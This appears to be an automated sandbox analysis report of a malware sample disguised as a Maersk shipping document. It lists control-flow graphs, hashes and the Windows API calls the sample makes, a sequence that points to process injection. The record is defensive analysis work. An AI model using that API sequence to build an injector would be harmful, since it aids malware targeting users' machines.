                                                    control_flow_graph 549 31bd580-31bd60f GetCurrentProcess 553 31bd618-31bd64c GetCurrentThread 549->553 554 31bd611-31bd617 549->554 555 31bd64e-31bd654 553->555 556 31bd655-31bd689 GetCurrentProcess 553->556 554->553 555->556 557 31bd68b-31bd691 556->557 558 31bd692-31bd6ad call 31bd75a 556->558 557->558 562 31bd6b3-31bd6e2 GetCurrentThreadId 558->562 563 31bd6eb-31bd74d 562->563 564 31bd6e4-31bd6ea 562->564 564->563
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD5FE
                                                    • GetCurrentThread.KERNEL32 ref: 031BD63B
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD678
                                                    • GetCurrentThreadId.KERNEL32 ref: 031BD6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: c7a8b94199dd6b6ae00a7a22ac0ec8bdf88c66c303ab4d1cd19f01be31e2ae7d
                                                    • Instruction ID: 04063685a8ab9ad0107486992cc55a0814ec742c1869e38da2545eddcf1dc3cc
                                                    • Opcode Fuzzy Hash: c7a8b94199dd6b6ae00a7a22ac0ec8bdf88c66c303ab4d1cd19f01be31e2ae7d
                                                    • Instruction Fuzzy Hash: 265154B09003098FDB58DFAAD688BDEBBF5EF88314F248459E419B7260D7349984CF65

                                                    Control-flow Graph

                                                    control_flow_graph 622 7c49250-7c4925d 623 7c492b5 622->623 624 7c4925f-7c49276 622->624 625 7c492b7-7c492d5 623->625 626 7c49333-7c49342 624->626 629 7c492d7-7c492da 625->629 630 7c492dc-7c492e9 625->630 631 7c4934d-7c493ae 626->631 632 7c492eb-7c492fa 629->632 630->632 655 7c4932a 631->655 638 7c49312 632->638 639 7c492fc-7c49302 632->639 643 7c49315-7c49329 638->643 641 7c49304 639->641 642 7c49306-7c49308 639->642 641->638 642->638 657 7c49287-7c49331 655->657 658 7c49280 655->658 657->655 658->625 658->626 658->643 658->657
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8cq$8cq$8cq
                                                    • API String ID: 0-1458523781
                                                    • Opcode ID: e179ad07c9a9b77fd292b3b1ae6f6b7681a7f9e0df03b3d89e808bb481adf45f
                                                    • Instruction ID: 4c44aa58c6ce915b2997c4311dc2a9adaa92f1266ea6fd0d9a6c21b4e77dc7e5
                                                    • Opcode Fuzzy Hash: e179ad07c9a9b77fd292b3b1ae6f6b7681a7f9e0df03b3d89e808bb481adf45f
                                                    • Instruction Fuzzy Hash: C531F6B4A18226DFDB109BA6C4845BFBBB1FBCB310F11405AD547A72C5DB316C0687A3

                                                    Control-flow Graph

                                                    control_flow_graph 683 7c4837f-7c48387 684 7c483df-7c483e2 683->684 685 7c48389-7c48538 683->685 687 7c483e4-7c483ea 684->687 688 7c483fa-7c48417 684->688 689 7c483ec 687->689 690 7c483ee-7c483f0 687->690 693 7c48582-7c48587 688->693 694 7c4841d-7c48513 688->694 689->688 690->688
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$$_q$$_q
                                                    • API String ID: 0-336898379
                                                    • Opcode ID: c9c94848a78ed2001ea31f27ee39d51b39ac6dbb2fc36ef4ae9ace1e0f25b4f1
                                                    • Instruction ID: e35d832cabe3e35632ff60f95f6908c54e19b4fd29ac06d27461fc1ec46641e6
                                                    • Opcode Fuzzy Hash: c9c94848a78ed2001ea31f27ee39d51b39ac6dbb2fc36ef4ae9ace1e0f25b4f1
                                                    • Instruction Fuzzy Hash: F7012DF0654241DFEB284B6589997793BF1EB02708F144057D5069F582CBB69940CB62

                                                    Control-flow Graph

                                                    control_flow_graph 808 7c42ac7-7c42ad0 809 7c42aa5-7c42aaa 808->809 810 7c42ad2-7c42ae7 808->810 811 7c42aef-7c42af1 810->811 812 7c42af3-7c42b08 811->812 813 7c42b0b-7c42b78 call 7c420d8 811->813 822 7c42c24-7c42c3b 813->822 823 7c42b7e-7c42b80 813->823 834 7c42c41 822->834 835 7c42c3d-7c42c3f 822->835 824 7c42b86-7c42b91 call 7c422f0 823->824 825 7c42cb0-7c42cee 823->825 831 7c42b93-7c42b95 824->831 832 7c42bae-7c42bb2 824->832 836 7c42b97-7c42b9e 831->836 837 7c42ba0-7c42bab call 7c416cc 831->837 838 7c42bb4-7c42bc8 call 7c42418 832->838 839 7c42c11-7c42c1a 832->839 841 7c42c46-7c42c48 834->841 835->841 836->832 837->832 848 7c42bde-7c42be2 838->848 849 7c42bca-7c42bdb call 7c416cc 838->849 845 7c42c7d-7c42ca9 841->845 846 7c42c4a-7c42c76 841->846 845->825 846->845 853 7c42be4 848->853 854 7c42bea-7c42c03 848->854 849->848 853->854 859 7c42c05 854->859 860 7c42c0e 854->860 859->860 860->839
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (cq$Hcq
                                                    • API String ID: 0-4250889185
                                                    • Opcode ID: 49e2cddf1872d637f19c79a406055d95044996cd468d4b47542c39a1b2ba84b2
                                                    • Instruction ID: 72f7152ab26ca09d32f36a4039dd4e0ec29a9451eda55b373f3bcfff20ab4789
                                                    • Opcode Fuzzy Hash: 49e2cddf1872d637f19c79a406055d95044996cd468d4b47542c39a1b2ba84b2
                                                    • Instruction Fuzzy Hash: F051E3B1B001158FDB25EF79A9552BE7BE6BFC8210F148529E806EB394DF348D018795

                                                    Control-flow Graph

                                                    control_flow_graph 915 7c482d0-7c482dc 916 7c48333 915->916 917 7c482de-7c48335 915->917 916->917 934 7c48335 call 7c4839f 917->934 935 7c48335 call 7c4837f 917->935 919 7c4833b-7c4833d 923 7c482e6-7c482ec 919->923 924 7c482fc-7c4830b 919->924 925 7c482f0-7c482f2 923->925 926 7c482ee 923->926 927 7c4830d-7c4831a 924->927 928 7c4833f-7c4851f 924->928 925->924 926->924 927->928 929 7c4831c-7c48332 927->929 934->919 935->919
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q$$_q
                                                    • API String ID: 0-458585787
                                                    • Opcode ID: 0240737d33304428b5444c7fb5bb849dec65faba82bc3937ca094d3fb59c0fbb
                                                    • Instruction ID: 532c108f871271389fb06f3fe3a63227ba4c86026efe31fea4d197d567ac8f65
                                                    • Opcode Fuzzy Hash: 0240737d33304428b5444c7fb5bb849dec65faba82bc3937ca094d3fb59c0fbb
                                                    • Instruction Fuzzy Hash: AA11C1B091D646CFC328DB2AC84467ABFF8FB07344F1442ABE50AD7242D7748941C7A6

                                                    Control-flow Graph

                                                    control_flow_graph 936 7c4839f-7c483d7 938 7c483e0-7c483e2 936->938 939 7c483e4-7c483ea 938->939 940 7c483fa-7c48417 938->940 941 7c483ec 939->941 942 7c483ee-7c483f0 939->942 944 7c48582-7c48587 940->944 945 7c4841d-7c48513 940->945 941->940 942->940
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$$_q
                                                    • API String ID: 0-3070280950
                                                    • Opcode ID: 6758c435742177f7e7a0311af77b955d2d19e41eb57be245d0d2ba542b8e3a45
                                                    • Instruction ID: b66fbb86d26117c98ba64c372bd4cf4c8468a1503d1a08d388038e52d4e420b9
                                                    • Opcode Fuzzy Hash: 6758c435742177f7e7a0311af77b955d2d19e41eb57be245d0d2ba542b8e3a45
                                                    • Instruction Fuzzy Hash: EEF0FCF0B50305DBEB208B14CC96BA973B1FB10708F188862DD05AF681E6F19D90C791
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FA5F2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 00cea3f20c0735b0c301ec442ea8c0f17a1ca8064357c0129e8ea5e7de9efa98
                                                    • Instruction ID: f0ac7dc2c23e19ca95a88ecdbbf7703ae83dad8ae6535d9ce7383be9832494c6
                                                    • Opcode Fuzzy Hash: 00cea3f20c0735b0c301ec442ea8c0f17a1ca8064357c0129e8ea5e7de9efa98
                                                    • Instruction Fuzzy Hash: B0A17DB1D0061ADFDB10CFA8C8807EEBBB2BF44314F188569D859A7240DB749995CF92
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FA5F2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 031B59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 031B59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FA5B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 084AF05F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FA5B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 084AF05F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FA5BE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FA551E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031BD84F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FA5BE0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FA551E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031BD84F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FA5A1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FA5A1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07FA819D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07FA819D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (cq
                                                    • API String ID: 0-301743287
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %*&/)(#$^@!~-_
                                                    • API String ID: 0-3325533558
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te_q
                                                    • API String ID: 0-823545363
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q
                                                    • API String ID: 0-238743419
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 084AD4D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 084AD4D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: W
                                                    • API String ID: 0-655174618
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $_q
                                                    • API String ID: 0-238743419
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G
                                                    • API String ID: 0-985283518
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G
                                                    • API String ID: 0-985283518
                                                    • Opcode ID: fd6da84ee564e834af0a53c834fc2678f781afdd0519db7ac62007404bf56382
                                                    • Instruction ID: 19307e5a0f296d485bfc70422dadb9fddbf38f8383b7de9fb5cb194297e1ed8a
                                                    • Opcode Fuzzy Hash: fd6da84ee564e834af0a53c834fc2678f781afdd0519db7ac62007404bf56382
                                                    • Instruction Fuzzy Hash: C0C012B0408108EBCA04CF86D90562CB7ACEB02211F000189D80EA3201DB311E20AA82
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 237191a9b0698857b933a8c462f895ebc53983e9f190490d04de134fbfa1dd3c
                                                    • Instruction ID: d08cfa9b5bde36487cfa97f712811d8e987976718f36a957450ddf500c871f00
                                                    • Opcode Fuzzy Hash: 237191a9b0698857b933a8c462f895ebc53983e9f190490d04de134fbfa1dd3c
                                                    • Instruction Fuzzy Hash: 69D1E1F0F00286DFCB15AB69C5886AEBFF1FF85200F5544A9D482BB295E730C965CB85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7319da169142040b9b9cadaf5d0bd620210c2272727b9b8b0d26456346d7a30
                                                    • Instruction ID: 4ff4f8721e47dd6f9c62831bc1e29decdd2ace75a79998803ba60ceddc0dddc3
                                                    • Opcode Fuzzy Hash: b7319da169142040b9b9cadaf5d0bd620210c2272727b9b8b0d26456346d7a30
                                                    • Instruction Fuzzy Hash: 83F1D775D1061ACBCF10DFA8C854AEDB7B5FF58300F1086A9E549B7254EB70AA85CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39d5f9ab7a087263b61dbcbea51d02b4744da2ba4a02461e80fcd8b34493c900
                                                    • Instruction ID: ff175b9cbbfbb408ca5d6938f961723490343fca4d61fe27345bba3bc793a3db
                                                    • Opcode Fuzzy Hash: 39d5f9ab7a087263b61dbcbea51d02b4744da2ba4a02461e80fcd8b34493c900
                                                    • Instruction Fuzzy Hash: 95E1F871D1061A8FCF10DFA8C954AEDB7B5FF48300F1086AAD549B7254EB70AA89CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b727bf2a6d8d9ffce9125d4799161d54f25e1606cf84b7f0306ab13afc87f5a0
                                                    • Instruction ID: 7222067d4aeeb978040c66b759331954252db72e2424356b714422c1e05b5c9e
                                                    • Opcode Fuzzy Hash: b727bf2a6d8d9ffce9125d4799161d54f25e1606cf84b7f0306ab13afc87f5a0
                                                    • Instruction Fuzzy Hash: AFB1E675910619CFDB10EF68C840AD9FBB1FF49314F15C299E949BB211EB30AA89CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1350929326.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7c40000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1884bfe8e55178b8a3e3ee656a7e1a566b1461ad92a5f94fc8c1544e9bb197c5
